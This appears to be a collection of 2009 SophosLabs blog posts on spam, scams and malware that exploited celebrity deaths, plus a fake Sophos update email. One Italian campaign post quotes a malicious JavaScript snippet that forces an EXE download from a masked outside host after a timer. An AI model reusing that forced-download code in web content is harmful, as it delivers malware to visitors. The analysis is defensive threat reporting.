SophosLabs blog

Yes, sadly we’re still talking about people taking advantage of Michael Jackson’s death.

This week, we’ve seen a rise in malware purporting to show images and video leading up to Michael’s death — many malware groups around the world appear to be getting in on the act.

MJ X-Files Mail Message

MJ X-Files Web Content

Anyone taking the standard precautions shouldn’t have difficulty avoiding this one — just make sure Javascript is disabled by default (so you don’t get infected by Mal/ObfJS-BP as found in the 1×1 iFrame — it tries to download and run the EXE via an old Acrobat Reader vulnerability), and don’t run the linked EXE manually (everyone knows that clicking on EXEs on a web page is a bad idea, right?) and get infected with Troj/ZBot-GJ.

While most of the malware is following this format, the Italians are getting a bit more creative:

MJ Italian Video Message

For those of you following along who don’t read Italian, my rough translation of the text is as follows:

The whole world was devastated when and Michael Jackson was found dead.
His death is surrounded with mystery; no one knows what happened, only that the mega star is dead.
But not just that. The following video clip shows Michael’s last moments and the cruel truth about his death.
Watch it and do not forget to leave a flower on Michael’s grave.
SHOCKING IMAGES! This video is not suited for children under the age of 16

This message contains a link to the following site:

The site, purporting to be an Italian YouTube site, throws up an error saying that you need to update your Flash player to view the video… with a download link to fake Codec malware Troj/ZBot-GK. It also contains the following Javascript code that I found very interesting:


<!--
function doDownload() {
/Genera il link al file zippato da scaricare
(tr. Generate the link to the zipped file to download)
location.href = “http://youtube****.com/Codec/120.exe”;
}

/Fa partire il download dopo 10 secondi da quando
/l’intermprete JavaScript ha rilevato la funzione
(tr. The download starts 10 seconds after the JavaScript interpreter has taken over the function)
window.setTimeout(”doDownload()”, 4000);
/–>

This associated code essentially forces the linked codec to download and possibly run after ten seconds of inactivity on the page. What I find interesting is that the script is well formatted and commented in Italian, and appears to be designed to force download a zip file. This implies that you can expect to see other Italian-targeted malware of this kind in the future.

You’re still safe as long as you keep Javascript disabled for untrusted websites and don’t download the EXE. But downloading the “update” can be a bit more tempting than the previous example.

Not to worry… Sophos blocks the e-mails, the websites, and the malware, so reading this blog is likely the closest you’ll come to this sordid display of opportunism.

I saw yet another article today on the rise in cybercrime on Facebook http://www.reuters.com/article/newsOne/idUSTRE55S55820090629

We’ve been talking about the dangers of Facebook and Twitter for a couple of years now [1], [2], [3], [4], [5], [6].

This seems to be bringing back to the forefront the argument of locking down business networks to prevent access to these sites. Previous arguments have usually been limited to productivity drains, but as malware on these sites rise, security should be the overriding concern. The potential for information leaks from employees posting to these sites is increasing, as well as the possible damage from malware being sent from a corporation’s compromised network. And there’s still the whole cybersquatting issue, which also seems to be rising. There are companies that have been targeted with fake Facebook and Twitter profiles, which could potentially damage the company’s reputation.

With these considerations, should businesses lock down access to these sites at the risk of upsetting their employees?

… but is she security conscious?

I was reading my RSS reader when I came across this blog article from the WSJ: http://blogs.wsj.com/digits/2009/06/26/how-moms-feel-about-social-media/?mod=rss_WSJBlog and it really got me thinking. How many of these sites have been set up securely? How many of these moms are putting up their private details not thinking about the possible consequences of what happens if the site gets compromised?

Many of these sites are set up by women (and men) with the best of intentions.  They either have a bit of tech knowledge or they hire someone with the coding experience to set up the website. They make sure that they have some of the bells and whistles like private messaging, email lists, and message boards. The user interfaces are scrutinized to make sure they are user-friendly and easy to navigate. But how much attention is given to whether there are vulnerabilities in the server that is running the software? Who maintains the server and makes sure it’s patched and has AV on it? Is the software itself buggy and vulnerable to attack? Are they doing enough to protect their users?

Here’s a great example. I’m a member of several mom-centric social networks. One of which was in fact compromised. The servers had been compromised with an SQL injection attack. The hackers then trashed many of the templates for the site (fortunately they had decent backups and could restore the templates) and stole all the user information, including things like birthdays, usernames, passwords and email addresses. They sent a broadcast once control of the site was regained, but the damage was done. Every user had been compromised and their info was out in the world.

All except mine.

I never give correct personal details (such as birthdays) to websites.  While I appreciate that in general such information is collected for demographic stats, there really is no need for specific birthdays, mother’s maiden names, etc. More people should really think about what it is they put on the enrollment forms. With a name, address and birthdate, identities can be stolen.

Security here is two-fold. Not only should the site be secure, but the people using them should also be wary and on the lookout for links from people they may  or may not know, not giving out personal details and using secure passwords that are not the same as their email passwords or banking passwords.

No doubt last week has been a very sad and depressing week for most people to learn of the passing of Michael Jackson.

Michael Jackson not only inspired millions of people through his music but his tireless charity work had given hope to millions more around the world. He is a true humanitarian and his ongoing contribution to society has established him as one of the most charitable celebrity in the world. The loss of Michael Jackson had devastated many people and left some feeling vulnerable because to many people Michael Jackson is more than a celebrity, he is their inspiration.

Unfortunately, there is a small minority in society that seems to have no sympathy at all and unscrupulously plans to benefit from such a tragedy.

Shortly after the death of Michael Jackson, scammers have started an online campaign to scam people into sending donations to the so called “MICHAEL JACKSON ORGANIZATION”.

Below is an example of the scam email that we received (which had already been blocked by Sophos appliances):

It is sad to see how some people can use the death of another person as a profiteering tool. Everyone should be careful not to fall prey to these scammers and always be on the look out for these common online scams.

There have been (counting, countless, lost count) posts about the many permutations of scam found in spam. This post highlights another area scammers have gone into. A couple on a Christian mission whose puppy cannot cope with the African weather. I am sure there will be many dog lovers out there who will put their hand up to help.

Is the weather in Africa really that bad? Why is it always in Africa but not somewhere in China?

It has been a quiet and sunny Sunday afternoon here in the SophosLabs Canada. With time on hand, I spend some time digging the archives to see if any new Michael Jackson-related spam have arrived in the past hours.

Here I will point out a few of the more interesting ones. There are the music, the meds, and the totally off-the-wall messages:

First up is a message that asks you to vote on “What killed Michael”:

In the message, a participant is supposed to get a free 7 album collection of Jackson’s songs for participating in the survey and “completing program requirements”. Just like the other “completing program requirements” spam messages, it’s likely there are hoops to jump through and purchases to engage in before there is any chance to receive the “free” items. Sadly, I am inclined to believe that there will be people out there who will try to participate in the survey to get the albums.

Next up is a spam message declaring that “Michael Jackson is not dead”:

This message has the hallmark of the image spam that have been so prevalent in recent days. In particular, the image of Michael Jackson has random, short, colored lines all over, often used to defeat antispam scanners. The curious will probably click on the image hoping to see evidence of Michael being alive. However, all that will do is take the surfer to a “Canadian Pharmacy” site selling the usual assortment of Viagra, Cialis and other pills. No evidence of Michael Jackson being alive. Sorry folks.

The last of the three messages is a “Rent your timeshare” spam:

So, what does this message have anything to do with Michael Jackson’s demise? The answer is in the source of the spam message:

The two circled text sections are Michael Jackson-related:

“Michael Jackson has hit the top of the pop singles chart”

“If any single song signaled that Michael Jacksons legacy as one of the top pop artists of all time would be secure, it was Billie Jean. The song remains a pop milestone and masterpiece. …”

As it is commonly known in the antispam circle, phrases from headline news and novels are regularly inserted into spam messages in order to defeat content and probability-based antispam scanners. Other than the hidden mention of Michael Jackson, this is just another one of typically-seen spam messages.

After digging through our spamtraps, there is still no evidence of large volume spam campaigns involving the deceased pop icon. It still remains to be seen how else would spammers and malware authors take advantage of this widespread and much-followed news.

As many expected, the death of the “King of Pop” Michael Jackson has given malware authors a new topic to entice users into installing malware

Shortly after we detected the first spam message regarding Michael Jackson, the first malware related to his demise also arrived:

Michael Jackson malware spam

The body of the message is in Portuguese, which roughly translates into the following:

“The Los Angeles Times reported online that singer Michael Jackson died this Thursday (25th) at the age of 50. U.S. television networks CBS and ABC as well as the online versions of New York Times and Variety magazine are also reporting the death of the singer. Citing sources from Los Angeles firefighters, Jackson suffed from a cardiac arrest at his home, and was taken unconscious to the hospital.

Images of Michael Jackson’s body

Unpublished video not on-the-air yet.”

The image seems to be ripped from the entertainment biz show “Entertainment Tonight”, judging from the Orange “T” at the bottom left corner. The actual link, however, goes to a .com.au site which asks a user to download the file “Michael.Jackson.videos.scr”. This file is detected by Sophos Antivirus as Troj/Dloadr-CPD.

Interestingly, the youtube link at the very bottom is not hotlinked to any malware. If the link is pasted into a browser, it’ll take the audience to the music video of Michael Jackson’s hit “Thriller”.

Looking into our archives, we have not seen many samples of this malware spam and distribution seems limited so far. It is likely that more Michael Jackson-themed malware and spam is on its way however. It is advised that users be especially vigilant when they receive messages or links related to this news.

We don’t have a great many details on this yet, but we’ve had limited reports of malware sent out claiming to be a security update for Sophos.

This is being sent out in email, with the subject: “Update your SOPHOS IDE scanner”.  Attached to the email is a .rar file - or rather, an EXE file pretending to be a rar file.  At this time, the filename was “SOPHOS IDE scanner.rar”.  Please don’t run it - it will attempt to install malware on your system.  Sophos updates should be obtained via the auto-update function of Sophos Anti-Virus, or by visiting http://www.sophos.com/downloads/ide/ - we never send identity data (IDEs) via email.

The body of the email looks like this:

“Download latest virus identity (IDE) files

If you are running an older version of Sophos Anti-Virus and do not automatically update your protection, you should download virus identity files (IDEs), which provide detection and disinfection of viruses, worms, Trojans and spyware.

All the IDEs you need are available in a single compressed file. NOTE: Please RUN the application accordingly.”

Note that this has been copied from the genuine Sophos download page and slightly altered, to give an air of authenticity.

It’s quite possible this is targetted at existing Sophos customers, but the payload will do bad things to anyone who runs it.  If you’re sent one of these emails, please let us know, as this is quite recent and we’re not sure how widespread it is yet.

Sophos customers with HIPS enabled were protected from this new threat even before we had seen it.  The malicious payload of the email is now detected as Troj/Spoof-H, published in spoof-h.ide.

The death of the “King of Pop”, Michael Jackson, spread great shock through the entire world.

Just after about 8 hours of his demise, SophosLabs witnessed the first wave of spam messages employing the sad news in the subject line and body part to harvest victims’ email addresses.

In this kind of spam message, the spammer claims she/he has vital information about the death of Michael Jackson to share with somebody, ie you.

The body of spam message does not contains any call-to-action link such as url, email, or phone number. And the from email address of the message is bogus.

But the spammer can harvest receivers’ email addresses via a free live email address if the spam message is replied to.

If you get this message you need just delete it! Please do not respond!

It’s unfortunate that whenever a celebrity of any sort dies, scammers rejoice as they have new material that they can be certain will give them a boost in traffic to their sites.

Take today’s hot topic for example. Well known actress Farah Fawcett passed away after a long battle with cancer.

Looking at the Google Trends data we can see that nearly a dozen of the top 100 searched terms today have involved the words “Farrah Fawcett”. What this translates to in the eyes of scammers is a better opportunity to have you click one of their sites which redirects you to their own FakeAV site in an attempt to get your money.

Doing a quick Google search for the words “Farrah Fawcett Dead” turns up the following link on the first page of results.

Visiting the link with a FireFox addon such as NoScript allows us to prevent the immediate redirection to the FakeAV site, and instead we’re greeted with a page that looks like this.

Anyone who tries making sense of the text will quickly realize that it’s a list of random dictionary words strung together to make it seem like it’s a real site. Of course, they never actually intend for you to see the page since there’s some script code that redirects you to the common FakeAV page seen all over the web. If you weren’t running an addon such as NoScript, you’d see the following page.

It’s important to keep in mind that whenever a hot news topic pops up, there are people out there trying to take advantage of the situation. Stick to known news sites you are familiar with and be sure to keep your anti-virus software up to date.